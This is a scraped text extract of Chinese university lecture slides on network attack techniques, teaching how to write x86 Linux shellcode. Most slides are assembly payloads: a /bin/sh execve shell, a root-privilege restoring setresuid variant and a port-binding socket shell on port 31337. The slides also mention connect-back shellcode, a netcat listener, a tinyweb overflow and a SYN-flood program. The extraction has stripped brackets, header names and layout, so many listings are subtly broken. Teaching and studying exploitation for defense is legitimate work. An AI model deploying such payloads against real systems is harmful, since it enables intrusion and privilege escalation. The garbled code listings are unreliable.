《计算机网络攻击和防护技术:第五课》由会员分享,可在线阅读,更多相关《计算机网络攻击和防护技术:第五课(28页珍藏版)》请在金锄头文库上搜索。
1、1计算机网络攻击和防护技术第五课2OutlineAssembly LanguageShell CodeFrom C to Assembly to ShellcodeShell-Spawning ShellcodePort-Binding Shellcode Connect-back Shellcode3OutlineShell CodeExploit payloadArchitecture-specific machine instructionsWritten in assembly language, then converted to machine languageNeed diffe
2、rent shellcodes for different architecturesSelf-contained programAbsolute control over the exploited programDo anything a hacker wantsSpawn a shellOpen a port/service for hackerOpen a connection back to attackerAdd password into the /etc/passwd fileRemove lines from syslogNOP SledShell CodeRepeated
3、return address4From C to Assemblyhelloworld.cLinux system callEvery system call is enumeratedCan be referenced by number when making the calls in assemblylinux_system_call.pdf#include int main() printf(Hello World.n); return 0;5From C to AssemblyIntel assembly, to do system callUse int to send inter
4、rupt signal to kernelint 80 is used for system call.Int 80 will use four registers EAX: which system callEBX, ECX, EDX:1st, 2nd, 3rd argument to the system call helloworld.asmsection .data ; data segmentmsg db Hello, world!, 0x0a ; the string and newline charsection .text ; text segmentglobal _start
5、 ; Default entry point for ELF linking_start: ; SYSCALL: write(1, msg, 14) mov eax, 4 ; put 4 into eax, since write is syscall #4 mov ebx, 1 ; put 1 into ebx, since stdout is 1 mov ecx, msg ; put the address of the string into ecx mov edx, 14 ; put 14 into edx, since our string is 14 bytes int 0x80
6、; Call the kernel to make the system call happen ; SYSCALL: exit(0) mov eax, 1 ; put 1 into eax, since exit is syscall #1 mov ebx, 0 ; exit with success, ; only need one argument, so ecx, edx not set int 0x80 ; do the syscall6Assembly code to executable codeAssembly code need to be compilednasm f el
7、f helloworld.asm-f elf will assemble the helloworld.asm into an object foile reade to be linked asn an ELF libraryld helloworld.oGenerate executable file a.outIt works, however, it is not a ShellcodeShellcode need to be self contained and is not required linkingShellcode is injected into running pro
8、gram, not a standalone executable programCannot declare data layoutShould be position-independentReady to take over control of the processor regardless of its current state7Stack based shell codeStack commandspush pop call retStack based exploits are possible by call and ret instructionsIf ret addre
9、ss is overwritten, program will be redirectOverwrite the stored return address on the stack before the ret instructionString can be placed directly after a call instruction, the address of string will be pushed to the stack 8Helloworld1.sWithout using any memory segmentWill not be linked into an exe
10、cutableCan be injects into an existing processIt will execute position independent wayWill it work if used as shellcode?ot_working_shellcode.pdfHelloworld1.sBITS 32 ; tell nasm this is 32-bit code call mark_below ; call below the string to instructions db Hello, world!, 0x0a, 0x0d ; with newline and
11、 carriage return bytesmark_below:; ssize_t write(int fd, const void *buf, size_t count); pop ecx ; pop the return address (string ptr) into ecx mov eax, 4 ; write syscall # mov ebx, 1 ; STDOUT file descriptor mov edx, 15 ; length of the string int 0x80 ; do syscall: write(1, string, 14); void _exit(
12、int status); mov eax, 1 ; exit syscall # mov ebx, 0 ; status = 0 int 0x80 ; do syscall: exit(0)9Why it doesnt work?Cannot use gdb to debug shellcodeCan use core file to debugCore file will dump the running programs memory and other information into fileCan use gdb to show the content when program cr
13、ashes.why_shellcode_not_working.pdfRoot cause: shell remove null byte from shellcodeMaking the machine code not usableNeed to remove those null byte10Removing Null byteTrick 1:Use short jumpJump back instead of jump forwardStill have null byteswhy_shellcode_not_working.pdf helloworld2.sBITS 32 ; tel
14、l nasm this is 32-bit codejmp short one ; jump down to a call at the endtwo:; ssize_t write(int fd, const void *buf, size_t count); pop ecx ; pop the return address (string ptr) into ecx mov eax, 4 ; write syscall # mov ebx, 1 ; STDOUT file descriptor mov edx, 15 ; length of the string int 0x80 ; do
15、 syscall: write(1, string, 14); void _exit(int status); mov eax, 1 ; exit syscall # mov ebx, 0 ; status = 0 int 0x80 ; do syscall: exit(0)one: call two ; call back upwards to avoid null bytes db Hello, world!, 0x0a, 0x0d ; with newline and carriage ; return bytes11Removing Null byteTrick 2:Change to
16、 equivalent instructionsRegister widthax, bx, cx, dxal, ah, bl, bh, cl, ch, dl, dhAddressingjump shortuse xor to clear registerUse inc/dec for increase, decreaseNow all null byte removedworking_shellcode.pdf helloworld3.sBITS 32 ; tell nasm this is 32-bit codejmp short one ; jump down to a call at t
17、he endtwo:; ssize_t write(int fd, const void *buf, size_t count); pop ecx ; pop the return address (string ptr) into ecx xor eax, eax ; zero out full 32-bits of eax register mov al, 4 ; write syscall #4 to the low byte of eax xor ebx, ebx ; zero out ebx inc ebx ; increment ebx to 1, STDOUT file desc
18、riptor xor edx, edx mov dl, 15 ; length of the string int 0x80 ; do syscall: write(1, string, 14); void _exit(int status); mov al, 1 ; exit syscall #1, the top 3 bytes are still zeroed dec ebx ; decrement ebx back down to 0 for status = 0 int 0x80 ; do syscall: exit(0)one: call two ; call back upwar
19、ds to avoid null bytes db Hello, world!, 0x0a, 0x0d ; with newline and carriage return bytes12Shell Spawning ShellcodeTo spawn a shell, just make a system call to execute /bin/sh shell programSystem call number 11, execve()int execve (const char *filename, char *const argv, char *const envp);#includ
20、e int main() char filename = /bin/shx00; char *argv, *envp; / arrays that contain char pointers argv0 = filename; / only argument is filename argv1 = 0; / null terminate the argument array envp0 = 0; / null terminate the environment array execve(filename, argv, envp);13Shell Spawning ShellcodeAssemb
21、ly shell codeLeaLoad effective address, like the address of in c languageebx+8 dereference as pointerTotal 45 bytes exec_shell.cBITS 32 jmp short two ; Jump down to the bottom for the call trickone:; int execve(const char *filename, char *const argv , char *const envp) pop ebx ; ebx has the addr of
22、the string xor eax, eax ; put 0 into eax mov ebx+7, al ; null terminate the /bin/sh string mov ebx+8, ebx ; put addr from ebx where the AAAA is mov ebx+12, eax ; put 32-bit null terminator where the BBBB is lea ecx, ebx+8 ; load the address of ebx+8 into ecx for argv ptr lea edx, ebx+12 ; edx = ebx
23、+ 12, which is the envp ptr mov al, 11 ; syscall #11 int 0x80 ; do ittwo: call one ; Use a call to get string address db /bin/shXAAAABBBB ; the XAAAABBBB bytes arent needed14Shellcode optimizationThe smaller, the betterRemove the unneeded XAAAABBBBUse register more efficientlyUsing push for memory o
24、peration tiny_shell.cBITS 32; execve(const char *filename, char *const argv , char *const envp) xor eax, eax ; zero our eax push eax ; push some nulls for string termination push 0x68732f2f ; push /sh to the stack push 0x6e69622f ; push /bin to the stack mov ebx, esp ; put the address of /bin/sh int
25、o ebx, via esp push eax ; push 32-bit null terminator to stack mov edx, esp ; this is an empty array for envp push ebx ; push string addr to stack above null terminator mov ecx, esp ; this is the argv array with string ptr mov al, 11 ; syscall #11 int 0x80 ; do it15Restore PrivilegeProgram can lower
26、 their effective privilegesseteuid(uid_t euid)setegid(gid_t egid)Shellcode can restore the privilege back to the rootSet the real user id, effective user id, and save the set-user-id of current processint setresuid(uid_t_t ruid, uid_t euid, uid_t suid)int setresgid(gid_t_t rgid, gid_t egid, uid_t su
27、id)16priv_shellBITS 32; setresuid(uid_t ruid, uid_t euid, uid_t suid); xor eax, eax ; zero out eax xor ebx, ebx ; zero out ebx xor ecx, ecx ; zero out ecx xor edx, edx ; zero out edx mov al, 0xa4 ; 164 (0xa4) for syscall #164 int 0x80 ; setresuid(0, 0, 0) restore all root privs; execve(const char *f
28、ilename, char *const argv , char *const envp) xor eax, eax ; make sure eax is zeroed again mov al, 11 ; syscall #11 push ecx ; push some nulls for string termination push 0x68732f2f ; push /sh to the stack push 0x6e69622f ; push /bin to the stack mov ebx, esp ; put the address of /bin/sh into ebx, v
29、ia esp push ecx ; push 32-bit null terminator to stack mov edx, esp ; this is an empty array for envp push ebx ; push string addr to stack above null terminator mov ecx, esp ; this is the argv array with string ptr int 0x80 ; execve(/bin/sh, /bin/sh, NULL, NULL)17Further optimizationCdqGet eax and s
30、tore it into eax and edxMachine code 99One byte onlyChangexor eax, eaxmove al, 0xbTOpush BYTE 11pop eaxResult is the smaller shellcodeShellcode.sBITS 32; setresuid(uid_t ruid, uid_t euid, uid_t suid); xor eax, eax ; zero out eax xor ebx, ebx ; zero out ebx xor ecx, ecx ; zero out ecx cdq ; zero out
31、edx using the sign bit from eax mov BYTE al, 0xa4 ; syscall 164 (0xa4) int 0x80 ; setresuid(0, 0, 0) restore all root privs; execve(const char *filename, char *const argv , char *const envp) push BYTE 11 ; push 11 to the stack pop eax ; pop dword of 11 into eax push ecx ; push some nulls for string
32、termination push 0x68732f2f ; push /sh to the stack push 0x6e69622f ; push /bin to the stack mov ebx, esp ; put the address of /bin/sh into ebx, via esp push ecx ; push 32-bit null terminator to stack mov edx, esp ; this is an empty array for envp push ebx ; push string addr to stack above null term
33、inator mov ecx, esp ; this is the argv array with string ptr int 0x80 ; execve(/bin/sh, /bin/sh, NULL, NULL)18Port-binding shellcode#include #include #include #include #include int main(void) int sockfd, new_sockfd; / listen on sock_fd, new connection on new_fd struct sockaddr_in host_addr, client_a
34、ddr; / my address information socklen_t sin_size; int yes=1; sockfd = socket(PF_INET, SOCK_STREAM, 0); host_addr.sin_family = AF_INET; / host byte order host_addr.sin_port = htons(31337); / short, network byte order host_addr.sin_addr.s_addr = INADDR_ANY; / automatically fill with my IP memset(&(hos
35、t_addr.sin_zero), 0, 8); / zero the rest of the struct bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr); listen(sockfd, 4); sin_size = sizeof(struct sockaddr_in); new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);19Port-binding shellcode-SocketcallInside kern
36、el, all socket related function use a single system callint socketcall(int call, unsigned log *args);Possible call numbersocketcall.pdfRequired to create a listing server using port 31337Accept tcp connection20bind_port.sBITS 32; s = socket(2, 1, 0) push BYTE 0x66 ; socketcall is syscall #102 (0x66)
37、 pop eax cdq ; zero out edx for use as a null DWORD later xor ebx, ebx ; ebx is the type of socketcall inc ebx ; 1 = SYS_SOCKET = socket() push edx ; Build arg array: protocol = 0, push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1, push BYTE 0x2 ; AF_INET = 2 mov ecx, esp ; ecx = ptr to argument array in
38、t 0x80 ; after syscall, eax has socket file descriptor mov esi, eax ; save socket FD in esi for later; bind(s, 2, 31337, 0, 16) push BYTE 0x66 ; socketcall (syscall #102) pop eax inc ebx ; ebx = 2 = SYS_BIND = bind() push edx ; Build sockaddr struct: INADDR_ANY = 0 push WORD 0x697a ; (in reverse ord
39、er) PORT = 31337 push WORD bx ; AF_INET = 2 mov ecx, esp ; ecx = server struct pointer push BYTE 16 ; argv: sizeof(server struct) = 16, push ecx ; server struct pointer, push esi ; socket file descriptor mov ecx, esp ; ecx = argument array int 0x80 ; eax = 0 on success; listen(s, 0) mov BYTE al, 0x6
40、6 ; socketcall (syscall #102) inc ebx inc ebx ; ebx = 4 = SYS_LISTEN = listen() push ebx ; argv: backlog = 4, push esi ; socket fd mov ecx, esp ; ecx = argument array int 0x80; c = accept(s, 0, 0) mov BYTE al, 0x66 ; socketcall (syscall #102) inc ebx ; ebx = 5 = SYS_ACCEPT = accept() push edx ; argv
41、: socklen = 0, push edx ; sockaddr ptr = NULL, push esi ; socket fd mov ecx, esp ; ecx = argument array int 0x80 ; eax = connected socket FD21Port-binding shellcodeThe above shell code will listen on 31337 port and ready to accept new tcp connectionBut not useful since user cannot control the server
42、Combined with shell spawning codeCan swap standard I/O file descriptors with socket file descriptorsUse dup or dup2 system call to duplicate file descriptorint dup(int oldfd)Create a copy of the file descriptor oldfdint dup2(int oldfd, int newfd)Makes newfd the copy of oldfd, closing newfd first if
43、necessary22The last version of bind shellSocket related codeDuplicate file descriptors(socket data redirection)Shell executionbooksrcbooksrcbind_shell.s23Connect back shellcodePort-binding limitationPort might not be open by firewallIf a connection is outbound, then firewall normally will allow itAf
44、ter system is compromised, Hacker can ask the system connect back to hackerConnect back shellcodeA client side softwareNeed to call socket(), connect() only24Connect back shellcodeNetcat toolTiny_web vulnerabilityConnect back shellcodeUsing connect back shell code to exploit tiny_web vulnerability 2
45、5Netcat (nc) toolA featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.Reliable back-end tool that can be used directly or easily driven by other programs and scripts. feature-rich network debugging and exploration tool can create almost any
46、kind of connection Outbound and inbound connections, TCP or UDP, to or from any ports. Featured tunneling mode which allows also special tunneling such as UDP to TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface, and the remote host allow
47、ed to connect to the tunnel. Built-in port-scanning capabilities, with randomizer. Advanced usage options, such as buffered send-mode (one line every N seconds), and hexdump (to stderr or to a specified file) of trasmitted and received data. Optional RFC854 telnet codes parser and responder. nc v l
48、p 31337netcat.txt26Tinyweb examplebooksrcbooksrctinyweb.cThe source of vulerability: recv_line functionDoes not check the length of incoming linebooksrcbooksrchacking-network.h27Using tinyweb to create connect back connection shellcodeSocket related system callSocketConnectFile descriptor redirectDup2()Shellcodebooksrcbooksrcconnectback_shell.sconnect_back_shellcode_execute.pdf28Attack network design exampleSyn-floodingAttack use a lot of spoof source address to open socketSockets stay in open stateResource used upResult in DOSHow to do the synflooding?booksrcbooksrcsynflood.c
